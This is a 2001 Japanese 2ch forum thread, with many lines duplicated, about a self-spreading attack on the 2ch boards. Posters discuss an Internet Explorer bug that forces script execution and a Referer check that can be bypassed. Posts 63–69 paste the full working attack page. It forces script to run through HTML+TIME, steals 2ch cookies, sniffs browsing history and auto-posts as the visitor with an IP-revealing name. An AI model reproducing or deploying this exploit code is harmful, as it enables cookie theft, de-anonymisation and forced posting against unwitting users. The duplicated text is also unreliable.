またもや2chの危機です!!
26 :名無しさん@お腹いっぱい。:01/12/17 23:12
>>22
wget で file は取れたよ。
wget で file は取れたよ。
27 :名無しさん@お腹いっぱい。:01/12/17 23:16
>>26
で砂。xml:やらmain()やら。
で砂。xml:やらmain()やら。
28 :名無しさん@お腹いっぱい。:01/12/17 23:18
よく事情を理解していないのだけれども referer みて2ch以外からの投稿禁止にしておけばいいんじゃないの?
だめらしいな。
------------------------------------------------------------------
104 心得をよく読みましょう sage 01/12/17 23:13 ID:4EGFRoLh
>>90
IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使って
Refererを偽装しているから無駄
------------------------------------------------------------------
------------------------------------------------------------------
104 心得をよく読みましょう sage 01/12/17 23:13 ID:4EGFRoLh
>>90
IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使って
Refererを偽装しているから無駄
------------------------------------------------------------------
30 :名無しさん@お腹いっぱい。:01/12/17 23:24
>>28
script 内で referer は偽造できるらしい。ので無駄。
まあなんか 2ch サイドで対策始めたらしいのでとりあえずは収まるっしょ。
つうことで寝よ寝よ。
まあしかし DDoS は恐いね。あと IE のバグ/仕様も(゚д゚;)コワー
script 内で referer は偽造できるらしい。ので無駄。
まあなんか 2ch サイドで対策始めたらしいのでとりあえずは収まるっしょ。
つうことで寝よ寝よ。
まあしかし DDoS は恐いね。あと IE のバグ/仕様も(゚д゚;)コワー
31 :1:01/12/17 23:25
なんかよく分からないけどがんばってください
32 :名無しさん@お腹いっぱい。:01/12/17 23:29
プログラム冒頭より
<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png"></noscript>
<![endif]-->
What's?
<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png"></noscript>
<![endif]-->
What's?
IPアドレス固定の研究室内で隠れ2チャネラやっている私にとっては結構重要な問題だったりする(藁
34 :名無しさん@お腹いっぱい。:01/12/17 23:34
>JavaScript を OFF にしててもくらうという報告がこのスレにはある。
そいつはたぶんJavaをoffにしただけで、ActiveScriptはoffにしなかったのだろう。
そいつはたぶんJavaをoffにしただけで、ActiveScriptはoffにしなかったのだろう。
35 :名無しさん@お腹いっぱい。:01/12/17 23:40
xmlが悪い
あぼーん
あぼーん
あぼーん
あぼーん
40 :名無しさん@お腹いっぱい。:01/12/17 23:46
ここが悪い
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
41 :名無しさん@お腹いっぱい。:01/12/17 23:47
チェック
http://www.eucaly.net/~kei/test/check.html
IE5.5/6だとJAVAScript切っても実行されちゃうんだけど、
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
を削ると動かなくなるんだよね。
これってなんなのさ?
http://www.eucaly.net/~kei/test/check.html
IE5.5/6だとJAVAScript切っても実行されちゃうんだけど、
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
を削ると動かなくなるんだよね。
これってなんなのさ?
42 : :01/12/17 23:47
79 :心得をよく読みましょう :01/12/17 23:10 ID:4EGFRoLh
JavaScriptに関しての結論
IE5.5以降ではアクティブスクリプトをオフにしても無駄
このバグ(仕様?)を利用している。
http://www2.sala.or.jp/~uuu/dhtml/forcescript.html
IE5.01なら問題なし
JavaScriptに関しての結論
IE5.5以降ではアクティブスクリプトをオフにしても無駄
このバグ(仕様?)を利用している。
http://www2.sala.or.jp/~uuu/dhtml/forcescript.html
IE5.01なら問題なし
43 :名無しさん@お腹いっぱい。:01/12/17 23:53
44 :名無しさん@お腹いっぱい。:01/12/17 23:53
>42
消えてる?
<script id=scr1 language=JScript for=window event=onload>
alert('Hello World');
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
当方Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)で
ActiveX JAVA JAVAScript 切ってるんだけど、上のやつは実行されないんだよね。
消えてる?
<script id=scr1 language=JScript for=window event=onload>
alert('Hello World');
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
当方Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)で
ActiveX JAVA JAVAScript 切ってるんだけど、上のやつは実行されないんだよね。
45 :名無しさん@お腹いっぱい。:01/12/17 23:55
削除屋さん、流れを読んでくだせえ。
46 :名無しさん@お腹いっぱい。:01/12/17 23:55
>IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使ってRefererを偽装しているから無駄
↑これは間違い。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのようにしても2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、2つ目の例では書き込めないようにすれば良い。
↑これは間違い。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのようにしても2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、2つ目の例では書き込めないようにすれば良い。
>>45 すまん。ソース全部貼るのは許して。
48 :名無しさん@お腹いっぱい。:01/12/17 23:57
...しかしこれってIEの話うにっくす板の内容じゃない気が。
49 :名無しさん@お腹いっぱい。:01/12/17 23:58
検証のためだったけど…削除屋さん、ソース全部張ってスイマセン。
51 :名無しさん@お腹いっぱい。:01/12/18 00:00
メールで…
進行しては…
どうですか
進行しては…
どうですか
>>49 unix板の方にはいつも感謝ですけど、誰が覗き見して誰がどう悪用するかわかんないので、、スマソ
53 :45:01/12/18 00:02
54 :名無しさん@お腹いっぱい。:01/12/18 00:05
彼がきてからマ板は危機です。 TT
>>52
こんなにソース出回ってるのに、そういう対策はどうかと。
こんなにソース出回ってるのに、そういう対策はどうかと。
解決策っぽいのが出ているようだけどどうなんでしょ?
-----------------------------------------------------------------------
563 心得をよく読みましょう 01/12/18 00:11 ID:9aT/CaI4
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのような場合でも2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、2つ目の例では書き込めないように2chのCGIを、
if ($referer =~ /xxx\.2ch\.net\/.*/)
↓
if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すれば100%絶対に自動的に書き込めなくなります。
IEにRefererを偽装する機能もバグも存在しません。
574 心得をよく読みましょう sage 01/12/18 00:13 ID:TmX2ONFn
>>563
暫定措置としてはいいと思うけど
http://hoge.com/hoge.gif?http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
ってのがすぐ出回ると思われ。
585 104 sage 01/12/18 00:14 ID:pkTuEHYy
>>574
/^
で、「先頭が」 2ch.net じゃないと引っかかるので100%大丈夫です。
-----------------------------------------------------------------------
563 心得をよく読みましょう 01/12/18 00:11 ID:9aT/CaI4
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのような場合でも2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、2つ目の例では書き込めないように2chのCGIを、
if ($referer =~ /xxx\.2ch\.net\/.*/)
↓
if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すれば100%絶対に自動的に書き込めなくなります。
IEにRefererを偽装する機能もバグも存在しません。
574 心得をよく読みましょう sage 01/12/18 00:13 ID:TmX2ONFn
>>563
暫定措置としてはいいと思うけど
http://hoge.com/hoge.gif?http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
ってのがすぐ出回ると思われ。
585 104 sage 01/12/18 00:14 ID:pkTuEHYy
>>574
/^
で、「先頭が」 2ch.net じゃないと引っかかるので100%大丈夫です。
うーん。
意味無いとおもうんだけど。
リファラって自由に設定できそうなんだけど、間違ってます?
意味無いとおもうんだけど。
リファラって自由に設定できそうなんだけど、間違ってます?
58 :名無しさん@お腹いっぱい。:01/12/18 00:24
間違ってます。てかもうかなり沈静化した模様。
>>57
Referer自体は偽造できそうだけど、広く出回っているブラウザ上で偽造してリクエストを送ることが出来ない
ので今回のような事態を回避できるんじゃないかと思うんですが。
2chアタック用の特製ブラウザやボット相手には通じないけど、そういうのには既に別の対策がしてあるんじゃ
ないかな?
Referer自体は偽造できそうだけど、広く出回っているブラウザ上で偽造してリクエストを送ることが出来ない
ので今回のような事態を回避できるんじゃないかと思うんですが。
2chアタック用の特製ブラウザやボット相手には通じないけど、そういうのには既に別の対策がしてあるんじゃ
ないかな?
60 :名無しさん@お腹いっぱい。:01/12/18 00:44
ほ、放置なのか・・・<ML
61 :名無しさん@お腹いっぱい。:01/12/18 01:27
母体を仕掛ける先が明らかだから、ワームとしては運用しにくいと思われ。
まあそのへんのマシンを踏み台に使えばいいんだけど(藁
まあそのへんのマシンを踏み台に使えばいいんだけど(藁
このスレは多分終了しました。
ご協力ありがとうございました。
ご協力ありがとうございました。
63 :名無しさん@お腹いっぱい。:01/12/21 22:59
<!DOCTYPE>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
</HEAD>
<BODY>
<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.pn
g"></noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png" id=img
1 style=display:none>
<span id=span1 style=display:none></span>
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
</HEAD>
<BODY>
<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.pn
g"></noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png" id=img
1 style=display:none>
<span id=span1 style=display:none></span>
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>
64 :名無しさん@お腹いっぱい。:01/12/21 23:00
<input name=key>
<input name=time>
</form>
<script id=scr1 for=window event=onload>
var NAME='';
var TAR='';
function main1(){
NAME=parent.NAME;
var t1=TAR.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
key=searchKey(dom,bbs,3600);
}
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
<input name=time>
</form>
<script id=scr1 for=window event=onload>
var NAME='';
var TAR='';
function main1(){
NAME=parent.NAME;
var t1=TAR.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
key=searchKey(dom,bbs,3600);
}
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
65 :名無しさん@お腹いっぱい。:01/12/21 23:01
f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;
if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;
if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
66 :名無しさん@お腹いっぱい。:01/12/21 23:01
f1.MESSAGE.value='guest guest\nWelcome to 裏2ちゃんねる!\n'+p
arent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
parent.setTimeout("if1.location.replace('about:blank')",5000);
parent.img1.src=parent.img1.src2;
parent.img1.style.display='block';
f1.submit.click();
}
function main(){
var t1=location.search;
if(t1){
t1=t1.substr(1);
TAR=t1;
main1();
return;
}
t1=document.referrer;
if(!t1){
arent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
parent.setTimeout("if1.location.replace('about:blank')",5000);
parent.img1.src=parent.img1.src2;
parent.img1.style.display='block';
f1.submit.click();
}
function main(){
var t1=location.search;
if(t1){
t1=t1.substr(1);
TAR=t1;
main1();
return;
}
t1=document.referrer;
if(!t1){
67 :名無しさん@お腹いっぱい。:01/12/21 23:01
t1='http://tmp.2ch.net/kitchen/';
}
if(!t1){
img1.src=img1.src2;
img1.style.display='block';
return;
}
t1=t1.substr(7);
var t2=t1.indexOf('#');
if(t2>=0){t1=t1.substr(0,t2);}
var t3='';
var t2=t1.indexOf('/');
if(t2>=0){t3=t1.substr(0,t2);}
queryCookie(t3);
if1.location.replace(location.href+'?'+t1);
}
main();
function queryCookie(s){
var t1='about://'+s+'/\n';
t1+='<script id=scr1 for=window event=onload>';
t1+='try{parent.catchCookie(document.cookie)}catch(e){}';
}
if(!t1){
img1.src=img1.src2;
img1.style.display='block';
return;
}
t1=t1.substr(7);
var t2=t1.indexOf('#');
if(t2>=0){t1=t1.substr(0,t2);}
var t3='';
var t2=t1.indexOf('/');
if(t2>=0){t3=t1.substr(0,t2);}
queryCookie(t3);
if1.location.replace(location.href+'?'+t1);
}
main();
function queryCookie(s){
var t1='about://'+s+'/\n';
t1+='<script id=scr1 for=window event=onload>';
t1+='try{parent.catchCookie(document.cookie)}catch(e){}';
68 :名無しさん@お腹いっぱい。:01/12/21 23:02
t1+='<\/script><noscript><xml:namespace prefix=t /><?import namespace=t implemen
tation=#default#time2 /><t:set id=set1 to=\'\' attributeName=document.parentWind
ow.execScript(scr1.innerHTML),set1.outerHTML /></noscript>';
ic1.location.replace(t1);
}
function catchCookie(s){
NAME=recognizeCookie(s,'NAME');
}
function recognizeCookie(s,k){
var t=s.split('; ');
for(var i=0;i<t.length;i++){var r=t[i].split('=');if(r[0]==k){return unescape(r[
1])}}
return '';
}
function searchKey(dom,bbs,len){
var t1=Math.floor(new Date().getTime()/1000);
var t2=t1-len;
var t3='http://'+dom+'/test/read.cgi/'+bbs+'/';
for(var i=t1;i>t2;i--){
var a1=document.createElement('A');
tation=#default#time2 /><t:set id=set1 to=\'\' attributeName=document.parentWind
ow.execScript(scr1.innerHTML),set1.outerHTML /></noscript>';
ic1.location.replace(t1);
}
function catchCookie(s){
NAME=recognizeCookie(s,'NAME');
}
function recognizeCookie(s,k){
var t=s.split('; ');
for(var i=0;i<t.length;i++){var r=t[i].split('=');if(r[0]==k){return unescape(r[
1])}}
return '';
}
function searchKey(dom,bbs,len){
var t1=Math.floor(new Date().getTime()/1000);
var t2=t1-len;
var t3='http://'+dom+'/test/read.cgi/'+bbs+'/';
for(var i=t1;i>t2;i--){
var a1=document.createElement('A');
69 :名無しさん@お腹いっぱい。:01/12/21 23:02
a1.href=t3+String(i)+'/l50';
span1.appendChild(a1);
if(a1.currentStyle.visited=='1'){
return String(i);
}
}
return '';
}
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHT
ML),set1.outerHTML />
</noscript>
<![endif]-->
</BODY>
</HTML>
span1.appendChild(a1);
if(a1.currentStyle.visited=='1'){
return String(i);
}
}
return '';
}
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHT
ML),set1.outerHTML />
</noscript>
<![endif]-->
</BODY>
</HTML>
70 :名無しさん@お腹いっぱい。:02/02/27 23:16
もりあがり期待あげ
71 :名無しさん@お腹いっぱい。:02/03/04 21:11
まつりだまつりだ
72 :名無しさん@お腹いっぱい。:02/03/09 14:33
73 :名無しさん@お腹いっぱい。:02/03/10 23:08
まつつつつt
74 :名無しさん@お腹いっぱい。:02/03/29 19:08
ききです。黄門も閉鎖された
感動age